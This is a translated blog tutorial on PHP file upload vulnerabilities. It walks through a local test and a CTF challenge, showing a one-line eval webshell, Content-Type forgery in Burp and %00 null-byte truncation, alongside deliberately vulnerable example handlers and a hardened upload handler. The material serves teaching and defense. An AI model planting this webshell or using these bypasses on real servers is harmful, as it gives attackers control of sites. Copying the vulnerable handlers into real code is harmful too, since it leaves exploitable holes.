0x00 What is file upload
Letting users upload files to a web site is like opening another door through which a malicious user can reach the server. Even so, it is a common requirement in today's web applications because it improves business efficiency: an enterprise support portal lets employees share files with each other, and many sites allow users to upload pictures, videos, avatars and many other kinds of files. The more features you offer users, the larger the attack surface of the web application. A malicious user who exploits an upload feature can gain a foothold on the site, and the likelihood of the server being compromised is very high.
0x01 Why file upload is vulnerable
When files are uploaded, if the server-side script does not strictly validate and filter them, it is easy to upload arbitrary files, including script files.
A normal PHP file by itself does no harm to the server.
But PHP, like other programming languages, can list the files in a directory, read file contents, execute system commands and so on.
So if the server-side script does not strictly validate and filter uploaded files, a malicious PHP file can be uploaded and used to control the entire site, or even the server. Such a malicious PHP file is also known as a webshell.
0x02 Where file upload vulnerabilities exist
Improper server configuration
Upload vulnerabilities in open-source editors
Client-side (local) upload restrictions are bypassed
The server-side filter is lax or bypassed
File parsing vulnerabilities cause uploaded files to be executed
File path truncation
0x03 File upload examples (local test)
[Figure 1]
Set up Burp Suite as a local proxy and capture the upload request. Comparing the two, we can see that PHP's <file name> and <file type> correspond to the <filename> and <Content-Type> fields of the multipart part in the captured packet.
In this code the upload handler checks the file type through <$_FILES['upfile']['type']>. Comparing it with the first figure shows that this value is nothing more than the <Content-Type> of the multipart part in the HTTP request, that is, the type the client reports for the uploaded file, so we can modify the packet to try a bypass. OK, now let's upload a PHP one-word trojan (one-line webshell):
<?php
// one-word trojan: runs whatever PHP code arrives in the POST parameter "xxx"
@eval($_POST['xxx']);
echo "Dahuiji...";
?>
[Figure 2]
Looking back at the page, we can see that we have successfully bypassed the file type check, and the China Chopper (webshell client) connection succeeded.
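The handler code from the local test did not survive on this page, so the following is an added example (not the original author's code) of an upload handler that performs the same Content-Type-only check described above, with the Burp-edited request shown in a comment. The field name upfile comes from the text; the uploads/ directory and the accepted MIME types are assumptions.

```php
<?php
// Added example, not the original page's code: a handler that checks only
// $_FILES['upfile']['type'], as the local test above describes. The uploads/
// directory and the accepted MIME types are assumptions.
declare(strict_types=1);

const UPLOAD_DIR = __DIR__ . '/uploads/';

// Vulnerable: $_FILES['upfile']['type'] is copied from the Content-Type line
// of the multipart part, which the client writes and Burp can edit freely.
function vulnerableUpload(array $file): string
{
    $allowedTypes = ['image/jpeg', 'image/png', 'image/gif'];
    if (!in_array($file['type'], $allowedTypes, true)) {
        return 'Rejected: not an image';
    }
    // The client's file name is kept, so shell.php is stored as shell.php in
    // the web root and is executed by PHP when it is requested.
    $dest = UPLOAD_DIR . basename($file['name']);
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return 'Upload failed';
    }
    return 'Saved as ' . $dest;
}

/*
 * Multipart part as edited in Burp for the bypass; only Content-Type changed
 * (the browser's own value for a .php file is replaced with image/jpeg):
 *
 *   Content-Disposition: form-data; name="upfile"; filename="shell.php"
 *   Content-Type: image/jpeg
 *
 *   <?php @eval($_POST['xxx']);
 *
 * The server-side check sees image/jpeg and accepts the PHP file.
 */

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['upfile'])) {
    echo vulnerableUpload($_FILES['upfile']);
}
```

The check never looks at the file's bytes or its extension, so a one-word trojan named shell.php with a forged Content-Type lands in uploads/ as executable PHP.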
URL: http://ctf4.shiyanbar.com/web/upload/
[Figure 3]
First we make the modifications shown above to the captured packet.
[Figure 4]
In the hex view we can see that <.> is <2e>. At the <2e> in front of <jpg> we insert a byte (the right-click menu has <Insert byte>) and set it to 00.
[Figure 5]
OK, we have now successfully obtained the flag.
Now let's explain how this experiment works:
1. Why add <.jpg> after the file name, and put the modified file name after <uploads/> in the packet? When PHP checks the file suffix it takes the last <.xxx>. After our modification PHP treats the file as a .jpg, so the file name check is bypassed.
2. Why add a %00 truncation after the modified file name? We know we are uploading a PHP file, but without the %00 truncation the file is saved on the server as <xxx.php.jpg>, that is, as a picture file, and PHP will not parse it. With the %00 truncation the server cuts the name at the %00, dropping the <.jpg>, so the file is saved on the server as <xxx.php>, and our one-word trojan is in place as soon as the upload succeeds. (This trick relies on the path being handled by C string functions that stop at the first NUL byte; PHP 5.3.4 and later reject file paths containing a null byte, so it only works against older PHP versions.)
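The challenge's server code is not shown, so as an added example (not the challenge's own code) here is a handler with the shape the explanation above implies: the suffix check looks only at the last .xxx of the client's file name, and the destination comes from a client-supplied path field. The parameter names upfile and path, and the uploads/ directory, are assumptions.

```php
<?php
// Added example, not the challenge's code: reconstruction of the vulnerable
// shape the explanation above describes. Field names "upfile" and "path" and
// the uploads/ directory are assumptions.
declare(strict_types=1);

// Returns the text after the last dot, lower-cased ("" if there is none).
function lastSuffix(string $name): string
{
    $dot = strrchr($name, '.');
    return $dot === false ? '' : strtolower(substr($dot, 1));
}

// Vulnerable: checks only the last suffix of the client's file name, then
// saves to a path taken straight from the client's "path" field.
function vulnerableSave(string $clientName, string $clientPath, string $tmp): string
{
    if (!in_array(lastSuffix($clientName), ['jpg', 'jpeg', 'png', 'gif'], true)) {
        return 'Rejected: bad suffix';
    }
    // Step 1 of the bypass: "shell.php.jpg" has last suffix "jpg" and passes.
    // Step 2: path = "uploads/shell.php\0.jpg". On PHP before 5.3.4 the
    // underlying C open() stops at the NUL byte, so the file lands on disk as
    // uploads/shell.php. PHP 5.3.4 and later reject paths containing a NUL
    // (PHP 8 throws a ValueError), so this only works on old deployments.
    if (!@move_uploaded_file($tmp, $clientPath)) {
        return 'Upload failed';
    }
    return 'Saved as ' . $clientPath;
}

// What a NUL-terminated filesystem call actually sees for a given path.
function effectivePath(string $path): string
{
    $nul = strpos($path, "\0");
    return $nul === false ? $path : substr($path, 0, $nul);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['upfile'], $_POST['path'])) {
    echo vulnerableSave(
        (string) $_FILES['upfile']['name'],
        (string) $_POST['path'],
        (string) $_FILES['upfile']['tmp_name']
    );
}
```

Calling effectivePath("uploads/shell.php\0.jpg") returns "uploads/shell.php", which is exactly the difference between the name the suffix check saw (ending in jpg) and the name the file system used.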
Upload a normal picture.
[Figure 6]
Upload a one-word trojan to try to bypass the detection.
[Figure 7]
Why can't we bypass it this time? After we truncate the file name, when the packet reaches Apache, Apache performs the truncation, and at that point the truncated file name becomes <xxx.php>; when PHP checks it, it finds that the file suffix is <php>, and so our upload fails.... (The above is only my understanding of why the upload failed; please correct me. Technical discussion is welcome, and anyone who can bypass the methods above is welcome to share advice. Thanks...)
0x04 Upload vulnerability defense
Check the file suffix (extension)
Check the file type
Check the file contents
Set up an upload whitelist
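As an added example (not from the original page), the following handler applies the four defenses above together, and also removes the two weaknesses the experiments exploited: the client-supplied name and the client-supplied path never reach the file system. The field name upfile, the storage directory and the size limit are assumptions.

```php
<?php
// Added example, not from the original page: a hardened upload handler that
// applies the defenses listed above. Field name "upfile", the storage
// directory and the size limit are assumptions.
declare(strict_types=1);

// Store outside the web root (or in a directory with PHP execution disabled,
// e.g. Apache "php_flag engine off"), so a file that slips through is never run.
const STORE_DIR = __DIR__ . '/../uploads_store/';
const MAX_BYTES = 2 * 1024 * 1024;

// Whitelist: extension -> MIME type the file content must actually have.
const ALLOWED = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

function safeUpload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload error ' . (int) $file['error']);
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file');
    }
    if ((int) $file['size'] > MAX_BYTES) {
        throw new RuntimeException('File too large');
    }

    $name = (string) $file['name'];
    // 1. Suffix check: reject NUL bytes (the %00 trick), take the extension
    //    after the *last* dot, and require it to be on the whitelist.
    if (strpos($name, "\0") !== false) {
        throw new RuntimeException('Invalid file name');
    }
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('Extension not allowed');
    }

    // 2. Type check on the bytes, not on the client's Content-Type.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('Content is ' . $mime . ', not ' . ALLOWED[$ext]);
    }

    // 3. Content check: it must decode as an image of the declared type.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info['mime'] !== ALLOWED[$ext]) {
        throw new RuntimeException('Not a valid image');
    }

    // 4. Never reuse the client name or a client path: random name plus the
    //    whitelisted extension, in a fixed directory.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest   = STORE_DIR . $stored;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file');
    }
    return $stored;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['upfile'])) {
    try {
        echo 'Stored as ' . htmlspecialchars(safeUpload($_FILES['upfile']), ENT_QUOTES);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage(), ENT_QUOTES);
    }
}
```

The content checks still cannot rule out a valid image that also carries PHP code in its metadata, which is why the storage location matters as much as the checks: a file that is never interpreted by PHP cannot become a webshell, whatever it contains.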
This article is from the "Creative Pilgrim" blog; please keep this source when reproducing it: http://dearch.blog.51cto.com/10423918/1828635
File Upload vulnerability principle and example test